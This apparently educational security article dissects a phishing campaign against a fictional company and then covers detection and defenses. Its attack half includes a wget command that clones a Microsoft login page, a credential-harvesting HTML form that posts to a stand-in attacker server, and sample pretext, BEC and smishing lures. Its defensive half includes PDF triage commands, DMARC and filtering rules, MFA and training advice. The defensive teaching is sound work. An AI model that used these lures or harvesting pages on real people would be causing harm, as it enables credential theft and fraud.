Social Engineering: Anatomy of a Phishing Attack
Understand how attackers manipulate human psychology to bypass technical controls. Learn to identify phishing campaigns and build human firewalls.
Social Engineering: Anatomy of a Phishing Attack
The most sophisticated firewall in the world can be defeated by one employee clicking a link.
Social engineering exploits the weakest link in any security system: humans. This article dissects how attackers manipulate psychology, and how to defend against it.
Why Social Engineering Works
Humans are wired with cognitive biases that attackers exploit:
| Bias | Exploitation | Example |
|---|---|---|
| Authority | Impersonate someone important | ”CEO” requests urgent wire transfer |
| Urgency | Force quick decisions | ”Your account will be deleted in 24h” |
| Social Proof | ”Everyone else does it" | "Your colleagues already signed up” |
| Reciprocity | Give something, ask something back | Free PDF → malicious macro |
| Fear | Threaten negative consequences | ”Legal action if you don’t respond” |
| Curiosity | Offer irresistible information | ”Your salary review results attached” |
Anatomy of a Phishing Campaign
Phase 1: Reconnaissance
Attackers gather information before attacking:
Target: Acme Corporation
LinkedIn scraping:
- CEO: John Smith
- CFO: Sarah Johnson
- IT Admin: Mike Chen
Email format discovered: [email protected]
Recent news: Acme acquiring StartupX
→ Pretext: "Due diligence documents for StartupX acquisition"
Technologies (from job postings):
- Microsoft 365
- Salesforce
- SlackPhase 2: Infrastructure Setup
# Register lookalike domain
acme-corp.com → acme-c0rp.com (zero instead of 'o')
acmecorp.net
acme-corp-secure.com
# Set up mail server with SPF/DKIM
# (Makes emails look legitimate)
# Clone login page
wget -mk https://login.microsoftonline.com/
# Modify to capture credentialsPhase 3: Crafting the Payload
The Email:
From: Sarah Johnson <[email protected]>
To: Mike Chen <[email protected]>
Subject: URGENT: StartupX Acquisition Documents - Need IT Review
Hi Mike,
John asked me to get IT sign-off on the security assessment
for the StartupX acquisition. Legal needs this by EOD.
Please review and approve: https://acme-c0rp.com/documents/review
Let me know if you have any questions.
Best,
Sarah
Sarah Johnson
CFO, Acme Corporation
[email protected]
+1 (555) 123-4567Red flags (that tired employees miss):
- Spoofed sender domain (acme-c0rp.com)
- Urgency (“by EOD”)
- Authority (CEO request)
- Contextual relevance (real acquisition)
Phase 4: Credential Harvesting
The link leads to a cloned Microsoft login:
<!-- Looks identical to real login -->
<form action="https://attacker-server.com/harvest" method="POST">
<input name="email" placeholder="Email">
<input name="password" type="password" placeholder="Password">
<button>Sign In</button>
</form>
<!-- After capture, redirect to real site -->
<script>
// User thinks they mistyped password
window.location = "https://login.microsoftonline.com";
</script>Phase 5: Post-Exploitation
With Mike’s credentials:
- Access Microsoft 365 → Read emails, SharePoint
- Find more targets, internal documents
- Set up mail rules to hide attacker activity
- Pivot to other systems using same credentials
Types of Phishing Attacks
Spear Phishing
Targeted attacks using personal information:
"Hi John, saw your presentation at DefCon last week.
Here's that tool I mentioned: [malicious link]"Whaling
Targeting executives:
"Board meeting rescheduled - new agenda attached"
[Malicious PDF exploiting Adobe Reader]Smishing (SMS Phishing)
Your package couldn't be delivered.
Reschedule: https://dhl-track1ng.com/pkg/8273Vishing (Voice Phishing)
"This is Microsoft Support. We detected a virus on
your computer. Please give me remote access to fix it."Business Email Compromise (BEC)
Impersonating executives for financial fraud:
From: CEO (real but compromised account)
To: Accounts Payable
Please wire $47,000 to this account for a confidential
acquisition. Don't discuss with anyone - SEC regulations.Detection Techniques
Email Header Analysis
Received: from mail.acme-c0rp.com (185.234.xx.xx)
by mx.acme.com (Postfix)
Return-Path: <[email protected]>
Reply-To: [email protected] ← Different from From!Check:
- SPF/DKIM/DMARC results
- Received headers (trace the path)
- Reply-To mismatches
- X-Originating-IP
URL Analysis
Legitimate: https://login.microsoftonline.com/
Phishing: https://login.microsoftonline.com.attacker.com/
https://login-microsoftonline.com/
https://microsoft.login.com.phishing.site/auth
https://bit.ly/3xYz123 (shortened)Techniques:
- Hover before clicking
- Check for typosquatting
- Expand shortened URLs
- Verify SSL certificate
Attachment Analysis
# Check file type
file suspicious.pdf
# PDF document, version 1.7
# Look for JavaScript
pdftotext suspicious.pdf - | grep -i javascript
# Check for embedded objects
pdfid suspicious.pdf
# /JS: 1 ← JavaScript present
# /OpenAction: 1 ← Runs on openTechnical Defenses
Email Security
# DMARC Policy (DNS TXT record)
_dmarc.acme.com: "v=DMARC1; p=reject; rua=mailto:[email protected]"
# Meaning:
# p=reject: Reject emails failing authentication
# rua: Send reports to this addressURL Filtering
# Block newly registered domains
if domain_age < 30_days:
block()
# Block lookalike domains
if levenshtein_distance(domain, known_brands) < 3:
quarantine()Multi-Factor Authentication
Even if credentials are phished:
Attacker has: username + password
MFA blocks: no access without second factor
# But beware: Real-time phishing proxies can capture MFA
# Use hardware keys (FIDO2/WebAuthn) for high-value targetsBuilding a Human Firewall
Security Awareness Training
Effective training includes:
- Simulated phishing — Monthly campaigns
- Immediate feedback — “You clicked a test phishing link”
- Positive reinforcement — Reward reporting, not punishment
- Role-specific training — Finance gets BEC training
Reporting Culture
Good: "I clicked something suspicious and reported it immediately"
Bad: "I clicked something suspicious and hoped no one noticed"Make reporting easy:
- Outlook “Report Phishing” button
- Slack command:
/report-phish - No blame policy
The “Trust But Verify” Protocol
For any unusual request (wire transfer, password reset,
credential sharing):
1. Don't reply to the email
2. Contact the person through a known channel
(saved phone number, not from email signature)
3. Verify the request is legitimate
4. Document the verificationPhishing Indicators Checklist
## Email Red Flags
□ Sender email doesn't match display name
□ Generic greeting ("Dear Customer")
□ Urgency or threats
□ Grammar/spelling errors (though AI is fixing this)
□ Unexpected attachments
□ Links don't match text (hover to check)
□ Requests for credentials or payment
## URL Red Flags
□ Misspelled domain
□ Extra subdomains (microsoft.com.attacker.com)
□ IP address instead of domain
□ HTTP instead of HTTPS
□ Shortened URLs from unknown sources
## Attachment Red Flags
□ Unexpected file types (.exe, .scr, .js)
□ "Enable Macros" prompt
□ Password-protected ZIP (evades scanning)
□ Double extensions (invoice.pdf.exe)Conclusion
Social engineering succeeds because it targets human nature, not technology. The best defense combines:
- Technical controls — Email filtering, MFA, URL analysis
- Process controls — Verification protocols for sensitive actions
- Human awareness — Continuous training and positive reporting culture
Remember: Attackers only need to succeed once. Defenders need to succeed every time. Make that “one time” as difficult as possible.
Next: Modern OSINT Tools — Learn what attackers can find about you.